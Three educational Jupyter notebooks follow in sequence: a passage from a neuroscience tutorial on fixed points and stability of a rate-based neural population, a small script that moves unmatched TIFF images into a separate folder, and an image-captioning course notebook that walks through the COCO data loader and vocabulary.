x_fp : value of fixed point
"""
# define the right hand of E dynamics
def my_WCr(x):
r = x
drdt = (-r + F(w * r + I_ext, a, theta))
y = np.array(drdt)
return y
x0 = np.array(r_guess)
x_fp = opt.root(my_WCr, x0).x.item()
return x_fp
def check_fp_single(x_fp, a, theta, w, I_ext, mytol=1e-4, **other_pars):
"""
Verify |dr/dt| < mytol
Args:
fp : value of fixed point
a, theta, w, I_ext: simulation parameters
mytol : tolerance, default as 10^{-4}
Returns :
Whether it is a correct fixed point: True/False
"""
# calculate Equation(3)
y = x_fp - F(w * x_fp + I_ext, a, theta)
# Here we set tolerance as 10^{-4}
return np.abs(y) < mytol
def my_fp_finder(pars, r_guess_vector, mytol=1e-4):
"""
Calculate the fixed point(s) through drE/dt=0
Args:
pars : Parameter dictionary
r_guess_vector : Initial values used for scipy.optimize function
mytol : tolerance for checking fixed point, default as 10^{-4}
Returns:
x_fps : values of fixed points
"""
x_fps = []
correct_fps = []
for r_guess in r_guess_vector:
x_fp = my_fp_single(r_guess, **pars)
if check_fp_single(x_fp, **pars, mytol=mytol):
x_fps.append(x_fp)
return x_fps
help(my_fp_finder)
r = np.linspace(0, 1, 1000)
pars = default_pars_single(I_ext=0.5, w=5)
drdt = compute_drdt(r, **pars)
#############################################################################
# TODO for students:
# Define initial values close to the intersections of drdt and y=0
# (How many initial values? Hint: How many times do the two lines intersect?)
# Calculate the fixed point with these initial values and plot them
#############################################################################
r_guess_vector = [...]
# Uncomment to test your values
# x_fps = my_fp_finder(pars, r_guess_vector)
# plot_dr_r(r, drdt, x_fps)
# to_remove solution
r = np.linspace(0, 1, 1000)
pars = default_pars_single(I_ext=0.5, w=5)
drdt = compute_drdt(r, **pars)
r_guess_vector = [0, .4, .9]
x_fps = my_fp_finder(pars, r_guess_vector)
with plt.xkcd():
plot_dr_r(r, drdt, x_fps)
```
## Interactive Demo: fixed points as a function of recurrent and external inputs.
You can now explore how the previous plot changes when the recurrent coupling $w$ and the external input $I_{\text{ext}}$ take different values. How does the number of fixed points change?
```
# @title
# @markdown Make sure you execute this cell to enable the widget!
def plot_intersection_single(w, I_ext):
# set your parameters
pars = default_pars_single(w=w, I_ext=I_ext)
# find fixed points
r_init_vector = [0, .4, .9]
x_fps = my_fp_finder(pars, r_init_vector)
# plot
r = np.linspace(0, 1., 1000)
drdt = (-r + F(w * r + I_ext, pars['a'], pars['theta'])) / pars['tau']
plot_dr_r(r, drdt, x_fps)
_ = widgets.interact(plot_intersection_single, w=(1, 7, 0.2),
I_ext=(0, 3, 0.1))
# to_remove explanation
"""
Discussion:
The fixed points of the single excitatory neuron population are determined by both
recurrent connections w and external input I_ext. In a previous interactive demo
we saw how the system showed two different steady-states when w = 0. But when w
doe not equal 0, for some range of w the system shows three fixed points (the middle
one being unstable) and the steady state depends on the initial conditions (i.e.
r at time zero.).
More on this will be explained in the next section.
""";
```
---
# Summary
In this tutorial, we have investigated the dynamics of a rate-based single population of neurons.
We learned about:
- The effect of the input parameters and the time constant of the network on the dynamics of the population.
- How to find the fixed point(s) of the system.
Next, we have two Bonus, but important concepts in dynamical system analysis and simulation. If you have time left, watch the next video and proceed to solve the exercises. You will learn:
- How to determine the stability of a fixed point by linearizing the system.
- How to add realistic inputs to our model.
---
# Bonus 1: Stability of a fixed point
```
# @title Video 3: Stability of fixed points
from IPython.display import YouTubeVideo
video = YouTubeVideo(id="KKMlWWU83Jg", width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
```
#### Initial values and trajectories
Here, let us first set $w=5.0$ and $I_{\text{ext}}=0.5$, and investigate the dynamics of $r(t)$ starting with different initial values $r(0) \equiv r_{\text{init}}$. We will plot the trajectories of $r(t)$ with $r_{\text{init}} = 0.0, 0.1, 0.2,..., 0.9$.
```
# @markdown Execute this cell to see the trajectories!
pars = default_pars_single()
pars['w'] = 5.0
pars['I_ext'] = 0.5
plt.figure(figsize=(8, 5))
for ie in range(10):
pars['r_init'] = 0.1 * ie # set the initial value
r = simulate_single(pars) # run the simulation
# plot the activity with given initial
plt.plot(pars['range_t'], r, 'b', alpha=0.1 + 0.1 * ie,
label=r'r$_{\mathrm{init}}$=%.1f' % (0.1 * ie))
plt.xlabel('t (ms)')
plt.title('Two steady states?')
plt.ylabel(r'$r$(t)')
plt.legend(loc=[1.01, -0.06], fontsize=14)
plt.show()
```
## Interactive Demo: dynamics as a function of the initial value
Let's now set $r_{\rm init}$ to a value of your choice in this demo. How does the solution change? What do you observe?
```
# @title
# @markdown Make sure you execute this cell to enable the widget!
pars = default_pars_single(w=5.0, I_ext=0.5)
def plot_single_diffEinit(r_init):
pars['r_init'] = r_init
r = simulate_single(pars)
plt.figure()
plt.plot(pars['range_t'], r, 'b', zorder=1)
plt.plot(0, r[0], 'bo', alpha=0.7, zorder=2)
plt.xlabel('t (ms)', fontsize=16)
plt.ylabel(r'$r(t)$', fontsize=16)
plt.ylim(0, 1.0)
plt.show()
_ = widgets.interact(plot_single_diffEinit, r_init=(0, 1, 0.02))
# to_remove explanation
"""
Discussion:
To better appreciate what is happening here, you should go back to the previous
interactive demo. Set the w = 5 and I_ext = 0.5.
You will find that there are three fixed points of the system for these values of
w and I_ext. Now, choose the initial value in this demo and see in which direction
the system output moves. When r_init is in the vicinity of the leftmost fixed points
it moves towards the left most fixed point. When r_init is in the vicinity of the
rightmost fixed points it moves towards the rightmost fixed point.
""";
```
### Stability analysis via linearization of the dynamics
Just like Equation $1$ in the case ($w=0$) discussed above, a generic linear system
$$\frac{dx}{dt} = \lambda (x - b),$$
has a fixed point for $x=b$. The analytical solution of such a system can be found to be:
$$x(t) = b + \big{(} x(0) - b \big{)} \text{e}^{\lambda t}.$$
Now consider a small perturbation of the activity around the fixed point: $x(0) = b+ \epsilon$, where $|\epsilon| \ll 1$. Will the perturbation $\epsilon(t)$ grow with time or will it decay to the fixed point? The evolution of the perturbation with time can be written, using the analytical solution for $x(t)$, as:
$$\epsilon (t) = x(t) - b = \epsilon \text{e}^{\lambda t}$$
- if $\lambda < 0$, $\epsilon(t)$ decays to zero, $x(t)$ will still converge to $b$ and the fixed point is "**stable**".
- if $\lambda > 0$, $\epsilon(t)$ grows with time, $x(t)$ will leave the fixed point $b$ exponentially, and the fixed point is, therefore, "**unstable**" .
### Compute the stability of Equation $1$
Similar to what we did in the linear system above, in order to determine the stability of a fixed point $r^{*}$ of the excitatory population dynamics, we perturb Equation (1) around $r^{*}$ by $\epsilon$, i.e. $r = r^{*} + \epsilon$. We can plug in Equation (1) and obtain the equation determining the time evolution of the perturbation $\epsilon(t)$:
\begin{align}
\tau \frac{d\epsilon}{dt} \approx -\epsilon + w F'(w\cdot r^{*} + I_{\text{ext}};a,\theta) \epsilon
\end{align}
where $F'(\cdot)$ is the derivative of the transfer function $F(\cdot)$. We can rewrite the above equation as:
\begin{align}
\frac{d\epsilon}{dt} \approx \frac{\epsilon}{\tau }[-1 + w F'(w\cdot r^* + I_{\text{ext}};a,\theta)]
\end{align}
That is, as in the linear system above, the value of
$$\lambda = [-1+ wF'(w\cdot r^* + I_{\text{ext}};a,\theta)]/\tau \qquad (4)$$
determines whether the perturbation will grow or decay to zero, i.e., $\lambda$ defines the stability of the fixed point. This value is called the **eigenvalue** of the dynamical system.
## Exercise 4: Compute $dF$
The derivative of the sigmoid transfer function is:
\begin{align}
\frac{dF}{dx} & = \frac{d}{dx} (1+\exp\{-a(x-\theta)\})^{-1} \\
& = a\exp\{-a(x-\theta)\} (1+\exp\{-a(x-\theta)\})^{-2}. \qquad (5)
\end{align}
Let's now find the expression for the derivative $\displaystyle{\frac{dF}{dx}}$ in the following cell and plot it.
```
def dF(x, a, theta):
"""
Population activation function.
Args:
x : the population input
a : the gain of the function
theta : the threshold of the function
Returns:
dFdx : the population activation response F(x) for input x
"""
###########################################################################
# TODO for students: compute dFdx ##
raise NotImplementedError("Student excercise: compute the deravitive of F")
###########################################################################
# Calculate the population activation
dFdx = ...
return dFdx
pars = default_pars_single() # get default parameters
x = np.arange(0, 10, .1) # set the range of input
# Uncomment below to test your function
# df = dF(x, pars['a'], pars['theta'])
# plot_dFdt(x, df)
# to_remove solution
def dF(x, a, theta):
"""
Population activation function.
Args:
x : the population input
a : the gain of the function
theta : the threshold of the function
Returns:
dFdx : the population activation response F(x) for input x
"""
# Calculate the population activation
dFdx = a * np.exp(-a * (x - theta)) * (1 + np.exp(-a * (x - theta)))**-2
return dFdx
pars = default_pars_single() # get default parameters
x = np.arange(0, 10, .1) # set the range of input
df = dF(x, pars['a'], pars['theta'])
with plt.xkcd():
plot_dFdt(x, df)
```
## Exercise 5: Compute eigenvalues
As discussed above, for the case with $w=5.0$ and $I_{\text{ext}}=0.5$, the system displays **three** fixed points. However, when we simulated the dynamics and varied the initial conditions $r_{\rm init}$, we could only obtain **two** steady states. In this exercise, we will now check the stability of each of the three fixed points by calculating the corresponding eigenvalues with the function `eig_single`. Check the sign of each eigenvalue (i.e., stability of each fixed point). How many of the fixed points are stable?
Note that the expression of the eigenvalue at fixed point $r^*$
$$\lambda = [-1+ wF'(w\cdot r^* + I_{\text{ext}};a,\theta)]/\tau$$
```
def eig_single(fp, tau, a, theta, w, I_ext, **other_pars):
"""
Args:
fp : fixed point r_fp
tau, a, theta, w, I_ext : Simulation parameters
Returns:
eig : eigevalue of the linearized system
"""
#####################################################################
## TODO for students: compute eigenvalue and disable the error
raise NotImplementedError("Student excercise: compute the eigenvalue")
######################################################################
# Compute the eigenvalue
eig = ...
return eig
# Find the eigenvalues for all fixed points of Exercise 2
pars = default_pars_single(w=5, I_ext=.5)
r_guess_vector = [0, .4, .9]
x_fp = my_fp_finder(pars, r_guess_vector)
# Uncomment below lines after completing the eig_single function.
# for fp in x_fp:
# eig_fp = eig_single(fp, **pars)
# print(f'Fixed point1 at {fp:.3f} with Eigenvalue={eig_fp:.3f}')
```
**SAMPLE OUTPUT**
```
Fixed point1 at 0.042 with Eigenvalue=-0.583
Fixed point2 at 0.447 with Eigenvalue=0.498
Fixed point3 at 0.900 with Eigenvalue=-0.626
```
```
# to_remove solution
def eig_single(fp, tau, a, theta, w, I_ext, **other_pars):
"""
Args:
fp : fixed point r_fp
tau, a, theta, w, I_ext : Simulation parameters
Returns:
eig : eigevalue of the linearized system
"""
# Compute the eigenvalue
eig = (-1. + w * dF(w * fp + I_ext, a, theta)) / tau
return eig
# Find the eigenvalues for all fixed points of Exercise 2
pars = default_pars_single(w=5, I_ext=.5)
r_guess_vector = [0, .4, .9]
x_fp = my_fp_finder(pars, r_guess_vector)
for fp in x_fp:
eig_fp = eig_single(fp, **pars)
print(f'Fixed point1 at {fp:.3f} with Eigenvalue={eig_fp:.3f}')
```
## Think!
Throughout the tutorial, we have assumed $w> 0 $, i.e., we considered a single population of **excitatory** neurons. What do you think will be the behavior of a population of inhibitory neurons, i.e., where $w> 0$ is replaced by $w< 0$?
```
# to_remove explanation
"""
Discussion:
You can check this by going back the second last interactive demo and set the
weight to w<0. You will notice that the system has only one fixed point and that
is at zero value. For this particular dynamics, the system will eventually converge
to zero. But try it out.
""";
```
---
# Bonus 2: Noisy input drives the transition between two stable states
## Ornstein-Uhlenbeck (OU) process
As discussed in several previous tutorials, the OU process is usually used to generate a noisy input into the neuron. The OU input $\eta(t)$ follows:
$$\tau_\eta \frac{d}{dt}\eta(t) = -\eta (t) + \sigma_\eta\sqrt{2\tau_\eta}\xi(t)$$
Execute the following function `my_OU(pars, sig, myseed=False)` to generate an OU process.
```
# @title OU process `my_OU(pars, sig, myseed=False)`
# @markdown Make sure you execute this cell to visualize the noise!
def my_OU(pars, sig, myseed=False):
"""
A functions that generates Ornstein-Uhlenback process
Args:
pars : parameter dictionary
sig : noise amplitute
myseed : random seed. int or boolean
Returns:
I : Ornstein-Uhlenbeck input current
"""
# Retrieve simulation parameters
dt, range_t = pars['dt'], pars['range_t']
Lt = range_t.size
tau_ou = pars['tau_ou'] # [ms]
# set random seed
if myseed:
np.random.seed(seed=myseed)
else:
np.random.seed()
# Initialize
noise = np.random.randn(Lt)
I_ou = np.zeros(Lt)
I_ou[0] = noise[0] * sig
# generate OU
for it in range(Lt - 1):
I_ou[it + 1] = (I_ou[it]
+ dt / tau_ou * (0. - I_ou[it])
+ np.sqrt(2 * dt / tau_ou) * sig * noise[it + 1])
return I_ou
pars = default_pars_single(T=100)
pars['tau_ou'] = 1. # [ms]
sig_ou = 0.1
I_ou = my_OU(pars, sig=sig_ou, myseed=2020)
plt.figure(figsize=(10, 4))
plt.plot(pars['range_t'], I_ou, 'r')
plt.xlabel('t (ms)')
plt.ylabel(r'$I_{\mathrm{OU}}$')
plt.show()
```
## Example: Up-Down transition
In the presence of two or more fixed points, noisy inputs can drive a transition between the fixed points! Here, we stimulate an E population for 1,000 ms applying OU inputs.
```
# @title Simulation of an E population with OU inputs
# @markdown Make sure you execute this cell to spot the Up-Down states!
pars = default_pars_single(T=1000)
pars['w'] = 5.0
sig_ou = 0.7
pars['tau_ou'] = 1. # [ms]
pars['I_ext'] = 0.56 + my_OU(pars, sig=sig_ou, myseed=2020)
r = simulate_single(pars)
plt.figure(figsize=(10, 4))
plt.plot(pars['range_t'], r, 'b', alpha=0.8)
plt.xlabel('t (ms)')
plt.ylabel(r'$r(t)$')
plt.show()
```
|
github_jupyter
|
# Find \*.tifs with no matching \*.jpg
#### Created on Cinco de Mayo in 2020 by Jeremy Moore and David Armstrong to identify \*.tif images that don't have a matching \*.jpg image for the Asian Art Museum of San Francisco
1. Manually set root_dir_path to the full path of the directory containing your *all_jpgs* and *all_tifs* directories
1. Programatically create a *no_match* directory inside of *all_tifs*
1. Get list of all \*.tifs in *all_tifs* directory
1. Get the identier, or stem, of each \*.tif
1. Check if this identifier exists as a \*.jpg in the *all_jpgs* directory first as a test
1. Run again and if there is no matching \*.jpg, move the \*.tif into the *no_match* directory
***Update root_dir_path location and verify names of *.jpg and *.tif directories below BEFORE running any cells!***
```
# imports from standard library
from pathlib import Path
# set root directory path that contains the directories with our tifs and jpgs
root_dir_path = Path('/Users/dlisla/Pictures/test_directory')
print(f'root_dir_path: {root_dir_path}')
print(f'root_dir_path.name: {root_dir_path.name}')
# set path to directory with our all_jpgs and all_tifs
bad_jpg_dir_path = root_dir_path.joinpath('all_jpgs')
all_tifs_dir_path = root_dir_path.joinpath('all_tifs')
# create a directory inside of all_tifs directory named no_match to move
no_match_dir_path = all_tifs_dir_path.joinpath('no_match')
no_match_dir_path.mkdir() # will raise a FileExistsError if the no_match directory already exists
# verify existence of no_match directory, if False, then do not continue
print(f'Does the no_match directory exist? {no_match_dir_path.is_dir()}')
# get sorted list of all *.tifs in all_tifs directory
# NOTE: this is NOT recursive and will not look inside of all_tifs subdirectories
# NOTE: this may also find non-image hidden files that start with a '.' and end with .tif
tif_path_list = sorted(all_tifs_dir_path.glob('*.tif'))
print(f'Total number of *.tif: {len(tif_path_list)}\n')
print(f'First *.tif paths: {tif_path_list[0]}')
print(f'Last *.tif paths: {tif_path_list[-1]}')
# for loop to test our code test what will happen
for tif_path in tif_path_list:
# get image's identifier to match against the JPEG filenames
identifier = tif_path.stem # stem is the Python name for identifier
# set jpg filename and path
jpg_filename = f'{identifier}.jpg'
jpg_path = bad_jpg_dir_path.joinpath(jpg_filename)
# does jpg exist?
if jpg_path.is_file(): # there's a match
# print(f'{jpg_path.name} has a match!\n') # commented out to silently skip matched images
pass
else: # we need to move it into our no_match directory
print(f'{tif_path.name} has no matching *.jpg')
# set new tif path inside of the no_match directory
new_tif_path = no_match_dir_path.joinpath(tif_path.name)
print(f'Moving to {new_tif_path} . . . (not really, this is a test)\n')
# warning, will move files!
for tif_path in tif_path_list:
# get image's identifier to match against the JPEG filenames
identifier = tif_path.stem # stem is the Python name for identifier
# set jpg filename and path
jpg_filename = f'{identifier}.jpg'
jpg_path = bad_jpg_dir_path.joinpath(jpg_filename)
# does jpg exist?
if jpg_path.is_file(): # there's a match
# print(f'{jpg_path.name} has a match!\n') # commented out to silently skip matched images
pass
else: # we need to move it into our no_match directory
print(f'{tif_path.name} has no JPEG')
# set new tif path inside of the no_match directory
new_tif_path = no_match_dir_path.joinpath(tif_path.name)
print(f'Moving to {new_tif_path} . . .')
# move our file
tif_path.rename(new_tif_path)
if new_tif_path.is_file():
print('Success!\n')
else:
print('Something broke with moving:{tif_path.name} to {tif_path}!!\n')
```
|
github_jupyter
|
# Computer Vision Nanodegree
## Project: Image Captioning
---
In this notebook, you will learn how to load and pre-process data from the [COCO dataset](http://cocodataset.org/#home). You will also design a CNN-RNN model for automatically generating image captions.
Note that **any amendments that you make to this notebook will not be graded**. However, you will use the instructions provided in **Step 3** and **Step 4** to implement your own CNN encoder and RNN decoder by making amendments to the **models.py** file provided as part of this project. Your **models.py** file **will be graded**.
Feel free to use the links below to navigate the notebook:
- [Step 1](#step1): Explore the Data Loader
- [Step 2](#step2): Use the Data Loader to Obtain Batches
- [Step 3](#step3): Experiment with the CNN Encoder
- [Step 4](#step4): Implement the RNN Decoder
<a id='step1'></a>
## Step 1: Explore the Data Loader
We have already written a [data loader](http://pytorch.org/docs/master/data.html#torch.utils.data.DataLoader) that you can use to load the COCO dataset in batches.
In the code cell below, you will initialize the data loader by using the `get_loader` function in **data_loader.py**.
> For this project, you are not permitted to change the **data_loader.py** file, which must be used as-is.
The `get_loader` function takes as input a number of arguments that can be explored in **data_loader.py**. Take the time to explore these arguments now by opening **data_loader.py** in a new window. Most of the arguments must be left at their default values, and you are only allowed to amend the values of the arguments below:
1. **`transform`** - an [image transform](http://pytorch.org/docs/master/torchvision/transforms.html) specifying how to pre-process the images and convert them to PyTorch tensors before using them as input to the CNN encoder. For now, you are encouraged to keep the transform as provided in `transform_train`. You will have the opportunity later to choose your own image transform to pre-process the COCO images.
2. **`mode`** - one of `'train'` (loads the training data in batches) or `'test'` (for the test data). We will say that the data loader is in training or test mode, respectively. While following the instructions in this notebook, please keep the data loader in training mode by setting `mode='train'`.
3. **`batch_size`** - determines the batch size. When training the model, this is number of image-caption pairs used to amend the model weights in each training step.
4. **`vocab_threshold`** - the total number of times that a word must appear in the in the training captions before it is used as part of the vocabulary. Words that have fewer than `vocab_threshold` occurrences in the training captions are considered unknown words.
5. **`vocab_from_file`** - a Boolean that decides whether to load the vocabulary from file.
We will describe the `vocab_threshold` and `vocab_from_file` arguments in more detail soon. For now, run the code cell below. Be patient - it may take a couple of minutes to run!
```
import sys
sys.path.append('/opt/cocoapi/PythonAPI')
from pycocotools.coco import COCO
!pip install nltk
import nltk
nltk.download('punkt')
from data_loader import get_loader
from torchvision import transforms
# Define a transform to pre-process the training images.
transform_train = transforms.Compose([
transforms.Resize(256), # smaller edge of image resized to 256
transforms.RandomCrop(224), # get 224x224 crop from random location
transforms.RandomHorizontalFlip(), # horizontally flip image with probability=0.5
transforms.ToTensor(), # convert the PIL Image to a tensor
transforms.Normalize((0.485, 0.456, 0.406), # normalize image for pre-trained model
(0.229, 0.224, 0.225))])
# Set the minimum word count threshold.
vocab_threshold = 5
# Specify the batch size.
batch_size = 10
# Obtain the data loader.
data_loader = get_loader(transform=transform_train,
mode='train',
batch_size=batch_size,
vocab_threshold=vocab_threshold,
vocab_from_file=False)
```
When you ran the code cell above, the data loader was stored in the variable `data_loader`.
You can access the corresponding dataset as `data_loader.dataset`. This dataset is an instance of the `CoCoDataset` class in **data_loader.py**. If you are unfamiliar with data loaders and datasets, you are encouraged to review [this PyTorch tutorial](http://pytorch.org/tutorials/beginner/data_loading_tutorial.html).
### Exploring the `__getitem__` Method
The `__getitem__` method in the `CoCoDataset` class determines how an image-caption pair is pre-processed before being incorporated into a batch. This is true for all `Dataset` classes in PyTorch; if this is unfamiliar to you, please review [the tutorial linked above](http://pytorch.org/tutorials/beginner/data_loading_tutorial.html).
When the data loader is in training mode, this method begins by first obtaining the filename (`path`) of a training image and its corresponding caption (`caption`).
#### Image Pre-Processing
Image pre-processing is relatively straightforward (from the `__getitem__` method in the `CoCoDataset` class):
```python
# Convert image to tensor and pre-process using transform
image = Image.open(os.path.join(self.img_folder, path)).convert('RGB')
image = self.transform(image)
```
After loading the image in the training folder with name `path`, the image is pre-processed using the same transform (`transform_train`) that was supplied when instantiating the data loader.
#### Caption Pre-Processing
The captions also need to be pre-processed and prepped for training. In this example, for generating captions, we are aiming to create a model that predicts the next token of a sentence from previous tokens, so we turn the caption associated with any image into a list of tokenized words, before casting it to a PyTorch tensor that we can use to train the network.
To understand in more detail how COCO captions are pre-processed, we'll first need to take a look at the `vocab` instance variable of the `CoCoDataset` class. The code snippet below is pulled from the `__init__` method of the `CoCoDataset` class:
```python
def __init__(self, transform, mode, batch_size, vocab_threshold, vocab_file, start_word,
end_word, unk_word, annotations_file, vocab_from_file, img_folder):
...
self.vocab = Vocabulary(vocab_threshold, vocab_file, start_word,
end_word, unk_word, annotations_file, vocab_from_file)
...
```
From the code snippet above, you can see that `data_loader.dataset.vocab` is an instance of the `Vocabulary` class from **vocabulary.py**. Take the time now to verify this for yourself by looking at the full code in **data_loader.py**.
We use this instance to pre-process the COCO captions (from the `__getitem__` method in the `CoCoDataset` class):
```python
# Convert caption to tensor of word ids.
tokens = nltk.tokenize.word_tokenize(str(caption).lower()) # line 1
caption = [] # line 2
caption.append(self.vocab(self.vocab.start_word)) # line 3
caption.extend([self.vocab(token) for token in tokens]) # line 4
caption.append(self.vocab(self.vocab.end_word)) # line 5
caption = torch.Tensor(caption).long() # line 6
```
As you will see soon, this code converts any string-valued caption to a list of integers, before casting it to a PyTorch tensor. To see how this code works, we'll apply it to the sample caption in the next code cell.
```
sample_caption = 'A person doing a trick on a rail while riding a skateboard.'
```
In **`line 1`** of the code snippet, every letter in the caption is converted to lowercase, and the [`nltk.tokenize.word_tokenize`](http://www.nltk.org/) function is used to obtain a list of string-valued tokens. Run the next code cell to visualize the effect on `sample_caption`.
```
import nltk
sample_tokens = nltk.tokenize.word_tokenize(str(sample_caption).lower())
print(sample_tokens)
```
In **`line 2`** and **`line 3`** we initialize an empty list and append an integer to mark the start of a caption. The [paper](https://arxiv.org/pdf/1411.4555.pdf) that you are encouraged to implement uses a special start word (and a special end word, which we'll examine below) to mark the beginning (and end) of a caption.
This special start word (`"<start>"`) is decided when instantiating the data loader and is passed as a parameter (`start_word`). You are **required** to keep this parameter at its default value (`start_word="<start>"`).
As you will see below, the integer `0` is always used to mark the start of a caption.
```
sample_caption = []
start_word = data_loader.dataset.vocab.start_word
print('Special start word:', start_word)
sample_caption.append(data_loader.dataset.vocab(start_word))
print(sample_caption)
```
In **`line 4`**, we continue the list by adding integers that correspond to each of the tokens in the caption.
```
sample_caption.extend([data_loader.dataset.vocab(token) for token in sample_tokens])
print(sample_caption)
```
In **`line 5`**, we append a final integer to mark the end of the caption.
Identical to the case of the special start word (above), the special end word (`"<end>"`) is decided when instantiating the data loader and is passed as a parameter (`end_word`). You are **required** to keep this parameter at its default value (`end_word="<end>"`).
As you will see below, the integer `1` is always used to mark the end of a caption.
```
end_word = data_loader.dataset.vocab.end_word
print('Special end word:', end_word)
sample_caption.append(data_loader.dataset.vocab(end_word))
print(sample_caption)
```
Finally, in **`line 6`**, we convert the list of integers to a PyTorch tensor and cast it to [long type](http://pytorch.org/docs/master/tensors.html#torch.Tensor.long). You can read more about the different types of PyTorch tensors on the [website](http://pytorch.org/docs/master/tensors.html).
```
import torch
sample_caption = torch.Tensor(sample_caption).long()
print(sample_caption)
```
And that's it! In summary, any caption is converted to a list of tokens, with _special_ start and end tokens marking the beginning and end of the sentence:
```
[<start>, 'a', 'person', 'doing', 'a', 'trick', 'while', 'riding', 'a', 'skateboard', '.', <end>]
```
This list of tokens is then turned into a list of integers, where every distinct word in the vocabulary has an associated integer value:
```
[0, 3, 98, 754, 3, 396, 207, 139, 3, 753, 18, 1]
```
Finally, this list is converted to a PyTorch tensor. All of the captions in the COCO dataset are pre-processed using this same procedure from **`lines 1-6`** described above.
As you saw, in order to convert a token to its corresponding integer, we call `data_loader.dataset.vocab` as a function. The details of how this call works can be explored in the `__call__` method in the `Vocabulary` class in **vocabulary.py**.
```python
def __call__(self, word):
if not word in self.word2idx:
return self.word2idx[self.unk_word]
return self.word2idx[word]
```
The `word2idx` instance variable is a Python [dictionary](https://docs.python.org/3/tutorial/datastructures.html#dictionaries) that is indexed by string-valued keys (mostly tokens obtained from training captions). For each key, the corresponding value is the integer that the token is mapped to in the pre-processing step.
Use the code cell below to view a subset of this dictionary.
```
# Preview the word2idx dictionary.
dict(list(data_loader.dataset.vocab.word2idx.items())[:10])
```
We also print the total number of keys.
```
# Print the total number of keys in the word2idx dictionary.
print('Total number of tokens in vocabulary:', len(data_loader.dataset.vocab))
```
As you will see if you examine the code in **vocabulary.py**, the `word2idx` dictionary is created by looping over the captions in the training dataset. If a token appears no less than `vocab_threshold` times in the training set, then it is added as a key to the dictionary and assigned a corresponding unique integer. You will have the option later to amend the `vocab_threshold` argument when instantiating your data loader. Note that in general, **smaller** values for `vocab_threshold` yield a **larger** number of tokens in the vocabulary. You are encouraged to check this for yourself in the next code cell by decreasing the value of `vocab_threshold` before creating a new data loader.
```
# Modify the minimum word count threshold.
vocab_threshold = 4
# Obtain the data loader.
data_loader = get_loader(transform=transform_train,
mode='train',
batch_size=batch_size,
vocab_threshold=vocab_threshold,
vocab_from_file=False)
# Print the total number of keys in the word2idx dictionary.
print('Total number of tokens in vocabulary:', len(data_loader.dataset.vocab))
```
There are also a few special keys in the `word2idx` dictionary. You are already familiar with the special start word (`"<start>"`) and special end word (`"<end>"`). There is one more special token, corresponding to unknown words (`"<unk>"`). All tokens that don't appear anywhere in the `word2idx` dictionary are considered unknown words. In the pre-processing step, any unknown tokens are mapped to the integer `2`.
```
unk_word = data_loader.dataset.vocab.unk_word
print('Special unknown word:', unk_word)
print('All unknown words are mapped to this integer:', data_loader.dataset.vocab(unk_word))
```
Check this for yourself below, by pre-processing the provided nonsense words that never appear in the training captions.
```
print(data_loader.dataset.vocab('jfkafejw'))
print(data_loader.dataset.vocab('ieowoqjf'))
```
The final thing to mention is the `vocab_from_file` argument that is supplied when creating a data loader. To understand this argument, note that when you create a new data loader, the vocabulary (`data_loader.dataset.vocab`) is saved as a [pickle](https://docs.python.org/3/library/pickle.html) file in the project folder, with filename `vocab.pkl`.
If you are still tweaking the value of the `vocab_threshold` argument, you **must** set `vocab_from_file=False` to have your changes take effect.
But once you are happy with the value that you have chosen for the `vocab_threshold` argument, you need only run the data loader *one more time* with your chosen `vocab_threshold` to save the new vocabulary to file. Then, you can henceforth set `vocab_from_file=True` to load the vocabulary from file and speed the instantiation of the data loader. Note that building the vocabulary from scratch is the most time-consuming part of instantiating the data loader, and so you are strongly encouraged to set `vocab_from_file=True` as soon as you are able.
Note that if `vocab_from_file=True`, then any supplied argument for `vocab_threshold` when instantiating the data loader is completely ignored.
```
# Obtain the data loader (from file). Note that it runs much faster than before!
data_loader = get_loader(transform=transform_train,
mode='train',
batch_size=batch_size,
vocab_from_file=True)
```
In the next section, you will learn how to use the data loader to obtain batches of training data.
<a id='step2'></a>
## Step 2: Use the Data Loader to Obtain Batches
The captions in the dataset vary greatly in length. You can see this by examining `data_loader.dataset.caption_lengths`, a Python list with one entry for each training caption (where the value stores the length of the corresponding caption).
In the code cell below, we use this list to print the total number of captions in the training data with each length. As you will see below, the majority of captions have length 10. Likewise, very short and very long captions are quite rare.
```
from collections import Counter
# Tally the total number of training captions with each length.
counter = Counter(data_loader.dataset.caption_lengths)
lengths = sorted(counter.items(), key=lambda pair: pair[1], reverse=True)
for value, count in lengths:
print('value: %2d --- count: %5d' % (value, count))
```
To generate batches of training data, we begin by first sampling a caption length (where the probability that any length is drawn is proportional to the number of captions with that length in the dataset). Then, we retrieve a batch of size `batch_size` of image-caption pairs, where all captions have the sampled length. This approach for assembling batches matches the procedure in [this paper](https://arxiv.org/pdf/1502.03044.pdf) and has been shown to be computationally efficient without degrading performance.
Run the code cell below to generate a batch. The `get_train_indices` method in the `CoCoDataset` class first samples a caption length, and then samples `batch_size` indices corresponding to training data points with captions of that length. These indices are stored below in `indices`.
These indices are supplied to the data loader, which then is used to retrieve the corresponding data points. The pre-processed images and captions in the batch are stored in `images` and `captions`.
```
import numpy as np
import torch.utils.data as data
# Randomly sample a caption length, and sample indices with that length.
indices = data_loader.dataset.get_train_indices()
print('sampled indices:', indices)
# Create and assign a batch sampler to retrieve a batch with the sampled indices.
new_sampler = data.sampler.SubsetRandomSampler(indices=indices)
data_loader.batch_sampler.sampler = new_sampler
# Obtain the batch.
images, captions = next(iter(data_loader))
print('images.shape:', images.shape)
print('captions.shape:', captions.shape)
# (Optional) Uncomment the lines of code below to print the pre-processed images and captions.
# print('images:', images)
# print('captions:', captions)
```
Each time you run the code cell above, a different caption length is sampled, and a different batch of training data is returned. Run the code cell multiple times to check this out!
You will train your model in the next notebook in this sequence (**2_Training.ipynb**). This code for generating training batches will be provided to you.
> Before moving to the next notebook in the sequence (**2_Training.ipynb**), you are strongly encouraged to take the time to become very familiar with the code in **data_loader.py** and **vocabulary.py**. **Step 1** and **Step 2** of this notebook are designed to help facilitate a basic introduction and guide your understanding. However, our description is not exhaustive, and it is up to you (as part of the project) to learn how to best utilize these files to complete the project. __You should NOT amend any of the code in either *data_loader.py* or *vocabulary.py*.__
In the next steps, we focus on learning how to specify a CNN-RNN architecture in PyTorch, towards the goal of image captioning.
<a id='step3'></a>
## Step 3: Experiment with the CNN Encoder
Run the code cell below to import `EncoderCNN` and `DecoderRNN` from **model.py**.
```
# Watch for any changes in model.py, and re-load it automatically.
% load_ext autoreload
% autoreload 2
# Import EncoderCNN and DecoderRNN.
from model import EncoderCNN, DecoderRNN
```
